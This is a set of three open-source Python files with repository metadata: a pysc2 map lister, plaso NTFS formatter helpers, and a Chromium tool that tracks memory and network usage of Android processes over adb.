"""Print the list of available maps according to the game."""
from absl import app
from pysc2 import run_configs
def main(unused_argv):
with run_configs.get().start(want_rgb=False) as controller:
available_maps = controller.available_maps()
print("\n")
print("Local map paths:")
for m in sorted(available_maps.local_map_paths):
print(" ", m)
print()
print("Battle.net maps:")
for m in sorted(available_maps.battlenet_map_names):
print(" ", m)
if __name__ == "__main__":
app.run(main)
| {
"content_hash": "85af6757eac6e08caece3e8f58b1ffb2",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 61,
"avg_line_length": 23.545454545454547,
"alnum_prop": 0.666023166023166,
"repo_name": "deepmind/pysc2",
"id": "babfaed0341ca400fa180385ac89c6ffc7851683",
"size": "1133",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pysc2/bin/battle_net_maps.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "733866"
},
{
"name": "Starlark",
"bytes": "42723"
}
],
"symlink_target": ""
} |
"""File system custom event formatter helpers."""
from plaso.formatters import interface
from plaso.formatters import manager
class NTFSFileReferenceFormatterHelper(interface.CustomEventFormatterHelper):
"""NTFS file reference formatter helper."""
IDENTIFIER = 'ntfs_file_reference'
def FormatEventValues(self, event_values):
"""Formats event values using the helper.
Args:
event_values (dict[str, object]): event values.
"""
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
class NTFSParentFileReferenceFormatterHelper(
interface.CustomEventFormatterHelper):
"""NTFS parent file reference formatter helper."""
IDENTIFIER = 'ntfs_parent_file_reference'
def FormatEventValues(self, event_values):
"""Formats event values using the helper.
Args:
event_values (dict[str, object]): event values.
"""
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
class NTFSPathHintsFormatterHelper(interface.CustomEventFormatterHelper):
"""NTFS path hints formatter helper."""
IDENTIFIER = 'ntfs_path_hints'
def FormatEventValues(self, event_values):
"""Formats event values using the helper.
Args:
event_values (dict[str, object]): event values.
"""
path_hints = event_values.get('path_hints', None)
if path_hints:
event_values['path_hints'] = ';'.join(path_hints)
manager.FormattersManager.RegisterEventFormatterHelpers([
NTFSFileReferenceFormatterHelper, NTFSParentFileReferenceFormatterHelper,
NTFSPathHintsFormatterHelper])
| {
"content_hash": "a01841279cb6e41f7060832eda78643c",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 78,
"avg_line_length": 31.55,
"alnum_prop": 0.716851558372953,
"repo_name": "kiddinn/plaso",
"id": "427e90126548dc1e5e83a79ee5ef51d4fd93dc59",
"size": "1917",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "plaso/formatters/file_system.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1047"
},
{
"name": "Makefile",
"bytes": "68"
},
{
"name": "PowerShell",
"bytes": "9560"
},
{
"name": "Python",
"bytes": "4878625"
},
{
"name": "Ruby",
"bytes": "926"
},
{
"name": "Shell",
"bytes": "26453"
}
],
"symlink_target": ""
} |
import argparse
import curses
import os
import re
import sys
import time
from operator import sub
_SRC_PATH = os.path.abspath(os.path.join(
os.path.dirname(__file__), '..', '..'))
sys.path.append(os.path.join(_SRC_PATH, 'third_party', 'catapult', 'devil'))
from devil.android import device_errors
from devil.android import device_utils
sys.path.append(os.path.join(_SRC_PATH, 'build', 'android'))
import devil_chromium
class Utils(object):
"""A helper class to hold various utility methods."""
@staticmethod
def FindLines(haystack, needle):
"""A helper method to find lines in |haystack| that contain the string
|needle|."""
return [ hay for hay in haystack if needle in hay ]
class Validator(object):
"""A helper class with validation methods for argparse."""
@staticmethod
def ValidatePath(path):
"""An argparse validation method to make sure a file path is writable."""
if os.path.exists(path):
return path
elif os.access(os.path.dirname(path), os.W_OK):
return path
raise argparse.ArgumentTypeError("%s is an invalid file path" % path)
@staticmethod
def ValidatePdfPath(path):
"""An argparse validation method to make sure a pdf file path is writable.
Validates a file path to make sure it is writable and also appends '.pdf' if
necessary."""
    if os.path.splitext(path)[-1].lower() != '.pdf':
path = path + '.pdf'
return Validator.ValidatePath(path)
@staticmethod
def ValidateNonNegativeNumber(val):
"""An argparse validation method to make sure a number is not negative."""
ival = int(val)
if ival < 0:
raise argparse.ArgumentTypeError("%s is a negative integer" % val)
return ival
class Timer(object):
"""A helper class to track timestamps based on when this program was
started"""
starting_time = time.time()
@staticmethod
def GetTimestamp():
"""A helper method to return the time (in seconds) since this program was
started."""
return time.time() - Timer.starting_time
class DeviceHelper(object):
"""A helper class with various generic device interaction methods."""
@staticmethod
def __GetUserIdForProcessName(adb, process_name):
"""Returns the userId of the application associated by |pid| or None if
not found."""
try:
process_name = process_name.split(':')[0]
cmd = ['dumpsys', 'package', process_name]
user_id_lines = adb.RunShellCommand(cmd, large_output=True)
user_id_lines = Utils.FindLines(user_id_lines, 'userId=')
if not user_id_lines:
return None
      columns = re.split(r'\s+|=', user_id_lines[0].strip())
if len(columns) >= 2:
return columns[1]
except device_errors.AdbShellCommandFailedError:
pass
return None
@staticmethod
def GetDeviceModel(adb):
"""Returns the model of the device with the |adb| connection."""
return adb.GetProp('ro.product.model').strip()
@staticmethod
def GetDeviceToTrack(preset=None):
"""Returns a device serial to connect to. If |preset| is specified it will
return |preset| if it is connected and |None| otherwise. If |preset| is not
specified it will return the first connected device."""
devices = [d.adb.GetDeviceSerial()
for d in device_utils.DeviceUtils.HealthyDevices()]
if not devices:
return None
if preset:
return preset if preset in devices else None
return devices[0]
@staticmethod
def GetPidsToTrack(adb, default_pid=None, process_filter=None):
"""Returns a list of tuples of (userid, pids, process name) based on the
input arguments. If |default_pid| is specified it will return that pid if
it exists. If |process_filter| is specified it will return the pids of
processes with that string in the name. If both are specified it will
intersect the two. The returned result is sorted based on userid."""
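    # A `ps` row looks roughly like
    #   "u0_a66 1234 160 512000 48620 ffffffff 00000000 S com.example.app",
    # where the pid is the second column and the process name the last one
    # (the exact columns vary across Android releases).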
pids = []
try:
pid_lines = adb.RunShellCommand(['ps'], large_output=True)
if default_pid:
pid_lines = Utils.FindLines(pid_lines, str(default_pid))
if process_filter:
pid_lines = Utils.FindLines(pid_lines, process_filter)
for line in pid_lines:
        data = re.split(r'\s+', line.strip())
pid = data[1]
name = data[-1]
# Confirm that the pid and name match. Using a regular grep isn't
# reliable when doing it on the whole 'ps' input line.
pid_matches = not default_pid or pid == str(default_pid)
name_matches = not process_filter or name.find(process_filter) != -1
if pid_matches and name_matches:
userid = DeviceHelper.__GetUserIdForProcessName(adb, name)
pids.append((userid, pid, name))
except device_errors.AdbShellCommandFailedError:
pass
return sorted(pids, key=lambda tup: tup[0])
class NetworkHelper(object):
"""A helper class to query basic network usage of an application."""
@staticmethod
def QueryNetwork(adb, userid):
"""Queries the device for network information about the application with a
user id of |userid|. It will return a list of values:
[ Download Background, Upload Background, Download Foreground, Upload
Foreground ]. If the application is not found it will return
[ 0, 0, 0, 0 ]."""
results = [0, 0, 0, 0]
if not userid:
return results
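    # Rows in /proc/net/xt_qtaguid/stats follow the layout
    #   idx iface acct_tag_hex uid_tag_int cnt_set rx_bytes rx_packets
    #   tx_bytes tx_packets ...
    # which is what the parsing indices defined below assume.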
try:
# Parsing indices for scanning a row from /proc/net/xt_qtaguid/stats.
# The application id
userid_idx = 3
# Whether or not the transmission happened with the application in the
# background (0) or foreground (1).
bg_or_fg_idx = 4
# The number of bytes received.
rx_idx = 5
# The number of bytes sent.
tx_idx = 7
net_lines = adb.ReadFile('/proc/net/xt_qtaguid/stats').splitlines()
net_lines = Utils.FindLines(net_lines, userid)
for line in net_lines:
        data = re.split(r'\s+', line.strip())
if data[userid_idx] != userid:
continue
dst_idx_offset = None
if data[bg_or_fg_idx] == '0':
dst_idx_offset = 0
elif data[bg_or_fg_idx] == '1':
dst_idx_offset = 2
if dst_idx_offset is None:
continue
results[dst_idx_offset] = round(float(data[rx_idx]) / 1000.0, 2)
results[dst_idx_offset + 1] = round(float(data[tx_idx]) / 1000.0, 2)
except device_errors.AdbShellCommandFailedError:
pass
return results
class MemoryHelper(object):
"""A helper class to query basic memory usage of a process."""
@staticmethod
def QueryMemory(adb, pid):
"""Queries the device for memory information about the process with a pid of
|pid|. It will query Native, Dalvik, and Pss memory of the process. It
returns a list of values: [ Native, Pss, Dalvik ]. If the process is not
found it will return [ 0, 0, 0 ]."""
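    # Typical `dumpsys meminfo <pid>` rows matched below (sizes in kB):
    #   Native Heap    20493 ...
    #   Dalvik Heap     7885 ...
    #         TOTAL    91216 ...
    # The exact layout differs between Android releases, which is why the
    # parsing below stops at the 'App Summary' section.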
results = [0, 0, 0]
mem_lines = adb.RunShellCommand(['dumpsys', 'meminfo', pid])
for line in mem_lines:
      match = re.split(r'\s+', line.strip())
# Skip data after the 'App Summary' line. This is to fix builds where
# they have more entries that might match the other conditions.
if len(match) >= 2 and match[0] == 'App' and match[1] == 'Summary':
break
result_idx = None
query_idx = None
if match[0] == 'Native' and match[1] == 'Heap':
result_idx = 0
query_idx = -2
elif match[0] == 'Dalvik' and match[1] == 'Heap':
result_idx = 2
query_idx = -2
elif match[0] == 'TOTAL':
result_idx = 1
query_idx = 1
# If we already have a result, skip it and don't overwrite the data.
if result_idx is not None and results[result_idx] != 0:
continue
if result_idx is not None and query_idx is not None:
results[result_idx] = round(float(match[query_idx]) / 1000.0, 2)
return results
class GraphicsHelper(object):
"""A helper class to query basic graphics memory usage of a process."""
# TODO(dtrainor): Find a generic way to query/fall back for other devices.
# Is showmap consistently reliable?
__NV_MAP_MODELS = ['Xoom']
__NV_MAP_FILE_LOCATIONS = ['/d/nvmap/generic-0/clients',
'/d/nvmap/iovmm/clients']
__SHOWMAP_MODELS = ['Nexus S',
'Nexus S 4G',
'Galaxy Nexus',
'Nexus 4',
'Nexus 5',
'Nexus 7']
__SHOWMAP_KEY_MATCHES = ['/dev/pvrsrvkm',
'/dev/kgsl-3d0']
@staticmethod
def __QueryShowmap(adb, pid):
"""Attempts to query graphics memory via the 'showmap' command. It will
look for |self.__SHOWMAP_KEY_MATCHES| entries to try to find one that
represents the graphics memory usage. Will return this as a single entry
array of [ Graphics ]. If not found, will return [ 0 ]."""
try:
mem_lines = adb.RunShellCommand(['showmap', '-t', pid])
for line in mem_lines:
match = re.split('[ ]+', line.strip())
if match[-1] in GraphicsHelper.__SHOWMAP_KEY_MATCHES:
return [ round(float(match[2]) / 1000.0, 2) ]
except device_errors.AdbShellCommandFailedError:
pass
return [ 0 ]
@staticmethod
def __NvMapPath(adb):
"""Attempts to find a valid NV Map file on the device. It will look for a
file in |self.__NV_MAP_FILE_LOCATIONS| and see if one exists. If so, it
will return it."""
for nv_file in GraphicsHelper.__NV_MAP_FILE_LOCATIONS:
if adb.PathExists(nv_file):
return nv_file
return None
@staticmethod
def __QueryNvMap(adb, pid):
"""Attempts to query graphics memory via the NV file map method. It will
find a possible NV Map file from |self.__NvMapPath| and try to parse the
graphics memory from it. Will return this as a single entry array of
[ Graphics ]. If not found, will return [ 0 ]."""
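    # The clients file is parsed assuming the pid sits in column 2 and the
    # allocation size (in bytes) in column 3; the exact debugfs layout
    # depends on the kernel version.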
nv_file = GraphicsHelper.__NvMapPath(adb)
if nv_file:
mem_lines = adb.ReadFile(nv_file).splitlines()
for line in mem_lines:
match = re.split(' +', line.strip())
if match[2] == pid:
return [ round(float(match[3]) / 1000000.0, 2) ]
return [ 0 ]
@staticmethod
def QueryVideoMemory(adb, pid):
"""Queries the device for graphics memory information about the process with
a pid of |pid|. Not all devices are currently supported. If possible, this
will return a single entry array of [ Graphics ]. Otherwise it will return
[ 0 ].
Please see |self.__NV_MAP_MODELS| and |self.__SHOWMAP_MODELS|
to see if the device is supported. For new devices, see if they can be
supported by existing methods and add their entry appropriately. Also,
please add any new way of querying graphics memory as they become
available."""
model = DeviceHelper.GetDeviceModel(adb)
if model in GraphicsHelper.__NV_MAP_MODELS:
return GraphicsHelper.__QueryNvMap(adb, pid)
elif model in GraphicsHelper.__SHOWMAP_MODELS:
return GraphicsHelper.__QueryShowmap(adb, pid)
return [ 0 ]
class DeviceSnapshot(object):
"""A class holding a snapshot of memory and network usage for various pids
that are being tracked. If |show_mem| is True, this will track memory usage.
If |show_net| is True, this will track network usage.
Attributes:
pids: A list of tuples (userid, pid, process name) that should be
tracked.
memory: A map of entries of pid => memory consumption array. Right now
the indices are [ Native, Pss, Dalvik, Graphics ].
network: A map of entries of userid => network consumption array. Right
now the indices are [ Download Background, Upload Background,
Download Foreground, Upload Foreground ].
timestamp: The amount of time (in seconds) between when this program started
and this snapshot was taken.
"""
def __init__(self, adb, pids, show_mem, show_net):
"""Creates an instances of a DeviceSnapshot with an |adb| device connection
and a list of (pid, process name) tuples."""
super(DeviceSnapshot, self).__init__()
self.pids = pids
self.memory = {}
self.network = {}
self.timestamp = Timer.GetTimestamp()
for (userid, pid, name) in pids:
if show_mem:
self.memory[pid] = self.__QueryMemoryForPid(adb, pid)
if show_net and userid not in self.network:
self.network[userid] = NetworkHelper.QueryNetwork(adb, userid)
@staticmethod
def __QueryMemoryForPid(adb, pid):
"""Queries the |adb| device for memory information about |pid|. This will
return a list of memory values that map to [ Native, Pss, Dalvik,
Graphics ]."""
results = MemoryHelper.QueryMemory(adb, pid)
results.extend(GraphicsHelper.QueryVideoMemory(adb, pid))
return results
def __GetProcessNames(self):
"""Returns a list of all of the process names tracked by this snapshot."""
    return [pid_info[2] for pid_info in self.pids]
def HasResults(self):
"""Whether or not this snapshot was tracking any processes."""
    return bool(self.pids)
def GetPidInfo(self):
"""Returns a list of (userid, pid, process name) tuples that are being
tracked in this snapshot."""
return self.pids
def GetNameForPid(self, search_pid):
"""Returns the process name of a tracked |search_pid|. This only works if
|search_pid| is tracked by this snapshot."""
for (userid, pid, name) in self.pids:
if pid == search_pid:
return name
return None
def GetUserIdForPid(self, search_pid):
"""Returns the application userId for an associated |pid|. This only works
if |search_pid| is tracked by this snapshot and the application userId is
queryable."""
for (userid, pid, name) in self.pids:
if pid == search_pid:
return userid
return None
def IsFirstPidForUserId(self, search_pid):
"""Returns whether or not |search_pid| is the first pid in the |pids| with
the associated application userId. This is used to determine if network
statistics should be shown for this pid or if they have already been shown
for a pid associated with this application."""
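    # Relies on |self.pids| being sorted by userid (see
    # DeviceHelper.GetPidsToTrack), so pids sharing a userid are adjacent.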
prev_userid = None
for idx, (userid, pid, name) in enumerate(self.pids):
if pid == search_pid:
return prev_userid != userid
prev_userid = userid
return False
def GetMemoryResults(self, pid):
"""Returns a list of entries about the memory usage of the process specified
by |pid|. This will be of the format [ Native, Pss, Dalvik, Graphics ]."""
if pid in self.memory:
return self.memory[pid]
return None
def GetNetworkResults(self, userid):
"""Returns a list of entries about the network usage of the application
specified by |userid|. This will be of the format [ Download Background,
Upload Background, Download Foreground, Upload Foreground ]."""
if userid in self.network:
return self.network[userid]
return None
def GetLongestNameLength(self):
"""Returns the length of the longest process name tracked by this
snapshot."""
return len(max(self.__GetProcessNames(), key=len))
def GetTimestamp(self):
"""Returns the time since program start that this snapshot was taken."""
return self.timestamp
class OutputBeautifier(object):
"""A helper class to beautify the memory output to various destinations.
Attributes:
can_color: Whether or not the output should include ASCII color codes to
make it look nicer. Default is |True|. This is disabled when
writing to a file or a graph.
overwrite: Whether or not the output should overwrite the previous output.
Default is |True|. This is disabled when writing to a file or a
graph.
"""
__MEMORY_COLUMN_TITLES = ['Native',
'Pss',
'Dalvik',
'Graphics']
__NETWORK_COLUMN_TITLES = ['Bg Rx',
'Bg Tx',
'Fg Rx',
'Fg Tx']
__TERMINAL_COLORS = {'ENDC': 0,
'BOLD': 1,
'GREY30': 90,
'RED': 91,
'DARK_YELLOW': 33,
'GREEN': 92}
def __init__(self, can_color=True, overwrite=True):
"""Creates an instance of an OutputBeautifier."""
super(OutputBeautifier, self).__init__()
self.can_color = can_color
self.overwrite = overwrite
self.lines_printed = 0
self.printed_header = False
@staticmethod
def __FindPidsForSnapshotList(snapshots):
"""Find the set of unique pids across all every snapshot in |snapshots|."""
pids = set()
for snapshot in snapshots:
for (userid, pid, name) in snapshot.GetPidInfo():
pids.add((userid, pid, name))
return pids
@staticmethod
def __TermCode(num):
"""Escapes a terminal code. See |self.__TERMINAL_COLORS| for a list of some
terminal codes that are used by this program."""
return '\033[%sm' % num
@staticmethod
def __PadString(string, length, left_align):
"""Pads |string| to at least |length| with spaces. Depending on
|left_align| the padding will appear at either the left or the right of the
original string."""
return (('%' if left_align else '%-') + str(length) + 's') % string
@staticmethod
def __GetDiffColor(delta):
"""Returns a color based on |delta|. Used to color the deltas between
different snapshots."""
if not delta or delta == 0.0:
return 'GREY30'
elif delta < 0:
return 'GREEN'
elif delta > 0:
return 'RED'
@staticmethod
def __CleanRound(val, precision):
"""Round |val| to |precision|. If |precision| is 0, completely remove the
decimal point."""
return int(val) if precision == 0 else round(float(val), precision)
def __ColorString(self, string, color):
"""Colors |string| based on |color|. |color| must be in
|self.__TERMINAL_COLORS|. Returns the colored string or the original
string if |self.can_color| is |False| or the |color| is invalid."""
if not self.can_color or not color or not self.__TERMINAL_COLORS[color]:
return string
return '%s%s%s' % (
self.__TermCode(self.__TERMINAL_COLORS[color]),
string,
self.__TermCode(self.__TERMINAL_COLORS['ENDC']))
def __PadAndColor(self, string, length, left_align, color):
"""A helper method to both pad and color the string. See
|self.__ColorString| and |self.__PadString|."""
return self.__ColorString(
self.__PadString(string, length, left_align), color)
def __OutputLine(self, line):
"""Writes a line to the screen. This also tracks how many times this method
was called so that the screen can be cleared properly if |self.overwrite| is
|True|."""
sys.stdout.write(line + '\n')
if self.overwrite:
self.lines_printed += 1
def __ClearScreen(self):
"""Clears the screen based on the number of times |self.__OutputLine| was
called."""
if self.lines_printed == 0 or not self.overwrite:
return
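    # Terminfo capabilities: 'cuu1' moves the cursor up one line, 'el'
    # clears to the end of the line and 'cr' moves to the beginning of the
    # line.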
key_term_up = curses.tparm(curses.tigetstr('cuu1'))
key_term_clear_eol = curses.tparm(curses.tigetstr('el'))
key_term_go_to_bol = curses.tparm(curses.tigetstr('cr'))
sys.stdout.write(key_term_go_to_bol)
sys.stdout.write(key_term_clear_eol)
for i in range(self.lines_printed):
sys.stdout.write(key_term_up)
sys.stdout.write(key_term_clear_eol)
self.lines_printed = 0
def __PrintPidLabelHeader(self, snapshot):
"""Returns a header string with columns Pid and Name."""
if not snapshot or not snapshot.HasResults():
return
name_length = max(8, snapshot.GetLongestNameLength())
header = self.__PadString('Pid', 8, True) + ' '
header += self.__PadString('Name', name_length, False)
header = self.__ColorString(header, 'BOLD')
return header
def __PrintTimestampHeader(self):
"""Returns a header string with a Timestamp column."""
header = self.__PadString('Timestamp', 8, False)
header = self.__ColorString(header, 'BOLD')
return header
def __PrintMemoryStatsHeader(self):
"""Returns a header string for memory usage statistics."""
headers = ''
for header in self.__MEMORY_COLUMN_TITLES:
headers += self.__PadString(header, 8, True) + ' '
    headers += self.__PadString('(MB)', 8, False)
return self.__ColorString(headers, 'BOLD')
def __PrintNetworkStatsHeader(self):
"""Returns a header string for network usage statistics."""
headers = ''
for header in self.__NETWORK_COLUMN_TITLES:
headers += self.__PadString(header, 8, True) + ' '
headers += self.__PadString('(kB)', 8, False)
return self.__ColorString(headers, 'BOLD')
def __PrintTrailingHeader(self, snapshot):
"""Returns a header string for the header trailer (includes timestamp)."""
if not snapshot or not snapshot.HasResults():
return
header = '(' + str(round(snapshot.GetTimestamp(), 2)) + 's)'
return self.__ColorString(header, 'BOLD')
def __PrintArrayWithDeltas(self, results, old_results, precision=2):
"""Helper method to return a string of statistics with their deltas. This
takes two arrays and prints out "current (current - old)" for all entries in
the arrays."""
if not results:
return
deltas = [0] * len(results)
if old_results:
assert len(old_results) == len(results)
deltas = map(sub, results, old_results)
output = ''
for idx, val in enumerate(results):
round_val = self.__CleanRound(val, precision)
round_delta = self.__CleanRound(deltas[idx], precision)
output += self.__PadString(str(round_val), 8, True) + ' '
output += self.__PadAndColor('(' + str(round_delta) + ')', 8, False,
self.__GetDiffColor(deltas[idx]))
return output
def __PrintPidLabelStats(self, pid, snapshot):
"""Returns a string that includes the columns pid and process name for
the specified |pid|. This lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
name_length = max(8, snapshot.GetLongestNameLength())
name = snapshot.GetNameForPid(pid)
output = self.__PadAndColor(pid, 8, True, 'DARK_YELLOW') + ' '
output += self.__PadAndColor(name, name_length, False, None)
return output
def __PrintTimestampStats(self, snapshot):
"""Returns a string that includes the timestamp of the |snapshot|. This
lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
timestamp_length = max(8, len("Timestamp"))
timestamp = round(snapshot.GetTimestamp(), 2)
output = self.__PadString(str(timestamp), timestamp_length, True)
return output
def __PrintMemoryStats(self, pid, snapshot, prev_snapshot):
"""Returns a string that includes memory statistics of the |snapshot|. This
lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
results = snapshot.GetMemoryResults(pid)
if not results:
return
old_results = prev_snapshot.GetMemoryResults(pid) if prev_snapshot else None
return self.__PrintArrayWithDeltas(results, old_results, 2)
def __PrintNetworkStats(self, userid, snapshot, prev_snapshot):
"""Returns a string that includes network statistics of the |snapshot|. This
lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
results = snapshot.GetNetworkResults(userid)
if not results:
return
old_results = None
if prev_snapshot:
old_results = prev_snapshot.GetNetworkResults(userid)
return self.__PrintArrayWithDeltas(results, old_results, 0)
def __PrintNulledNetworkStats(self):
"""Returns a string that includes empty network statistics. This lines up
with the associated header. This is used when showing statistics for pids
that share the same application userId. Network statistics should only be
shown once for each application userId."""
stats = ''
for title in self.__NETWORK_COLUMN_TITLES:
stats += self.__PadString('-', 8, True) + ' '
stats += self.__PadString('', 8, True)
return stats
def __PrintHeaderHelper(self,
snapshot,
show_labels,
show_timestamp,
show_mem,
show_net,
show_trailer):
"""Helper method to concat various header entries together into one header.
    This will line up with an entry built by __PrintStatsHelper if the same
values are passed to it."""
titles = []
if show_labels:
titles.append(self.__PrintPidLabelHeader(snapshot))
if show_timestamp:
titles.append(self.__PrintTimestampHeader())
if show_mem:
titles.append(self.__PrintMemoryStatsHeader())
if show_net:
titles.append(self.__PrintNetworkStatsHeader())
if show_trailer:
titles.append(self.__PrintTrailingHeader(snapshot))
return ' '.join(titles)
def __PrintStatsHelper(self,
pid,
snapshot,
prev_snapshot,
show_labels,
show_timestamp,
show_mem,
show_net):
"""Helper method to concat various stats entries together into one line.
This will line up with a header built by __PrintHeaderHelper if the same
values are passed to it."""
stats = []
if show_labels:
stats.append(self.__PrintPidLabelStats(pid, snapshot))
if show_timestamp:
stats.append(self.__PrintTimestampStats(snapshot))
if show_mem:
stats.append(self.__PrintMemoryStats(pid, snapshot, prev_snapshot))
if show_net:
userid = snapshot.GetUserIdForPid(pid)
show_userid = snapshot.IsFirstPidForUserId(pid)
if userid and show_userid:
stats.append(self.__PrintNetworkStats(userid, snapshot, prev_snapshot))
else:
stats.append(self.__PrintNulledNetworkStats())
return ' '.join(stats)
def PrettyPrint(self, snapshot, prev_snapshot, show_mem=True, show_net=True):
"""Prints |snapshot| to the console. This will show memory and/or network
deltas between |snapshot| and |prev_snapshot|. This will also either color
or overwrite the previous entries based on |self.can_color| and
|self.overwrite|. If |show_mem| is True, this will attempt to show memory
statistics. If |show_net| is True, this will attempt to show network
statistics."""
self.__ClearScreen()
if not snapshot or not snapshot.HasResults():
self.__OutputLine("No results...")
return
# Output Format
show_label = True
show_timestamp = False
show_trailer = True
self.__OutputLine(self.__PrintHeaderHelper(snapshot,
show_label,
show_timestamp,
show_mem,
show_net,
show_trailer))
for (userid, pid, name) in snapshot.GetPidInfo():
self.__OutputLine(self.__PrintStatsHelper(pid,
snapshot,
prev_snapshot,
show_label,
show_timestamp,
show_mem,
show_net))
def PrettyFile(self,
file_path,
snapshots,
diff_against_start,
show_mem=True,
show_net=True):
"""Writes |snapshots| (a list of DeviceSnapshots) to |file_path|.
|diff_against_start| determines whether or not the snapshot deltas are
between the first entry and all entries or each previous entry. This output
will not follow |self.can_color| or |self.overwrite|. If |show_mem| is
True, this will attempt to show memory statistics. If |show_net| is True,
this will attempt to show network statistics."""
if not file_path or not snapshots:
return
# Output Format
show_label = False
show_timestamp = True
show_trailer = False
pids = self.__FindPidsForSnapshotList(snapshots)
# Disable special output formatting for file writing.
can_color = self.can_color
self.can_color = False
with open(file_path, 'w') as out:
for (userid, pid, name) in pids:
out.write(name + ' (' + str(pid) + '):\n')
out.write(self.__PrintHeaderHelper(None,
show_label,
show_timestamp,
show_mem,
show_net,
show_trailer))
out.write('\n')
prev_snapshot = None
for snapshot in snapshots:
has_mem = show_mem and snapshot.GetMemoryResults(pid) is not None
has_net = show_net and snapshot.GetNetworkResults(userid) is not None
if not has_mem and not has_net:
continue
out.write(self.__PrintStatsHelper(pid,
snapshot,
prev_snapshot,
show_label,
show_timestamp,
show_mem,
show_net))
out.write('\n')
if not prev_snapshot or not diff_against_start:
prev_snapshot = snapshot
out.write('\n\n')
# Restore special output formatting.
self.can_color = can_color
def PrettyGraph(self, file_path, snapshots):
"""Creates a pdf graph of |snapshots| (a list of DeviceSnapshots) at
|file_path|. This currently only shows memory stats and no network
stats."""
# Import these here so the rest of the functionality doesn't rely on
# matplotlib
from matplotlib import pyplot
from matplotlib.backends.backend_pdf import PdfPages
if not file_path or not snapshots:
return
pids = self.__FindPidsForSnapshotList(snapshots)
pp = PdfPages(file_path)
for (userid, pid, name) in pids:
figure = pyplot.figure()
ax = figure.add_subplot(1, 1, 1)
ax.set_xlabel('Time (s)')
ax.set_ylabel('MB')
ax.set_title(name + ' (' + pid + ')')
mem_list = [[] for x in range(len(self.__MEMORY_COLUMN_TITLES))]
timestamps = []
for snapshot in snapshots:
results = snapshot.GetMemoryResults(pid)
if not results:
continue
timestamps.append(round(snapshot.GetTimestamp(), 2))
assert len(results) == len(self.__MEMORY_COLUMN_TITLES)
for idx, result in enumerate(results):
mem_list[idx].append(result)
colors = []
for data in mem_list:
colors.append(ax.plot(timestamps, data)[0])
for i in xrange(len(timestamps)):
ax.annotate(data[i], xy=(timestamps[i], data[i]))
figure.legend(colors, self.__MEMORY_COLUMN_TITLES)
pp.savefig()
pp.close()
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--process',
dest='procname',
help="A (sub)string to match against process names.")
parser.add_argument('-p',
'--pid',
dest='pid',
type=Validator.ValidateNonNegativeNumber,
help='Which pid to scan for.')
parser.add_argument('-d',
'--device',
dest='device',
help='Device serial to scan.')
parser.add_argument('-t',
'--timelimit',
dest='timelimit',
type=Validator.ValidateNonNegativeNumber,
help='How long to track memory in seconds.')
parser.add_argument('-f',
'--frequency',
dest='frequency',
default=0,
type=Validator.ValidateNonNegativeNumber,
help='How often to poll in seconds.')
parser.add_argument('-s',
'--diff-against-start',
dest='diff_against_start',
action='store_true',
help='Whether or not to always compare against the'
' original memory values for deltas.')
parser.add_argument('-b',
'--boring-output',
dest='dull_output',
action='store_true',
help='Whether or not to dull down the output.')
parser.add_argument('-k',
'--keep-results',
dest='no_overwrite',
action='store_true',
help='Keeps printing the results in a list instead of'
' overwriting the previous values.')
parser.add_argument('-g',
'--graph-file',
dest='graph_file',
type=Validator.ValidatePdfPath,
help='PDF file to save graph of memory stats to.')
parser.add_argument('-o',
'--text-file',
dest='text_file',
type=Validator.ValidatePath,
help='File to save memory tracking stats to.')
parser.add_argument('-m',
'--memory',
dest='show_mem',
action='store_true',
help='Whether or not to show memory stats. True by'
' default unless --n is specified.')
parser.add_argument('-n',
'--net',
dest='show_net',
action='store_true',
help='Whether or not to show network stats. False by'
' default.')
args = parser.parse_args()
# Add a basic filter to make sure we search for something.
if not args.procname and not args.pid:
args.procname = 'chrome'
# Make sure we show memory stats if nothing was specifically requested.
if not args.show_net and not args.show_mem:
args.show_mem = True
devil_chromium.Initialize()
curses.setupterm()
printer = OutputBeautifier(not args.dull_output, not args.no_overwrite)
sys.stdout.write("Running... Hold CTRL-C to stop (or specify timeout).\n")
try:
last_time = time.time()
adb = None
old_snapshot = None
snapshots = []
while not args.timelimit or Timer.GetTimestamp() < float(args.timelimit):
# Check if we need to track another device
device = DeviceHelper.GetDeviceToTrack(args.device)
if not device:
adb = None
elif not adb or device != str(adb):
#adb = adb_wrapper.AdbWrapper(device)
adb = device_utils.DeviceUtils(device)
old_snapshot = None
snapshots = []
try:
adb.EnableRoot()
except device_errors.CommandFailedError:
sys.stderr.write('Unable to run adb as root.\n')
sys.exit(1)
# Grab a snapshot if we have a device
snapshot = None
if adb:
pids = DeviceHelper.GetPidsToTrack(adb, args.pid, args.procname)
snapshot = None
if pids:
snapshot = DeviceSnapshot(adb, pids, args.show_mem, args.show_net)
if snapshot and snapshot.HasResults():
snapshots.append(snapshot)
printer.PrettyPrint(snapshot, old_snapshot, args.show_mem, args.show_net)
# Transfer state for the next iteration and sleep
delay = max(1, args.frequency)
if snapshot:
delay = max(0, args.frequency - (time.time() - last_time))
time.sleep(delay)
last_time = time.time()
if not old_snapshot or not args.diff_against_start:
old_snapshot = snapshot
except KeyboardInterrupt:
pass
if args.graph_file:
printer.PrettyGraph(args.graph_file, snapshots)
if args.text_file:
printer.PrettyFile(args.text_file,
snapshots,
args.diff_against_start,
args.show_mem,
args.show_net)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| {
"content_hash": "0e4a719a99f71ebb56278d2b984d32cc",
"timestamp": "",
"source": "github",
"line_count": 1005,
"max_line_length": 80,
"avg_line_length": 36.67860696517413,
"alnum_prop": 0.6070750366230807,
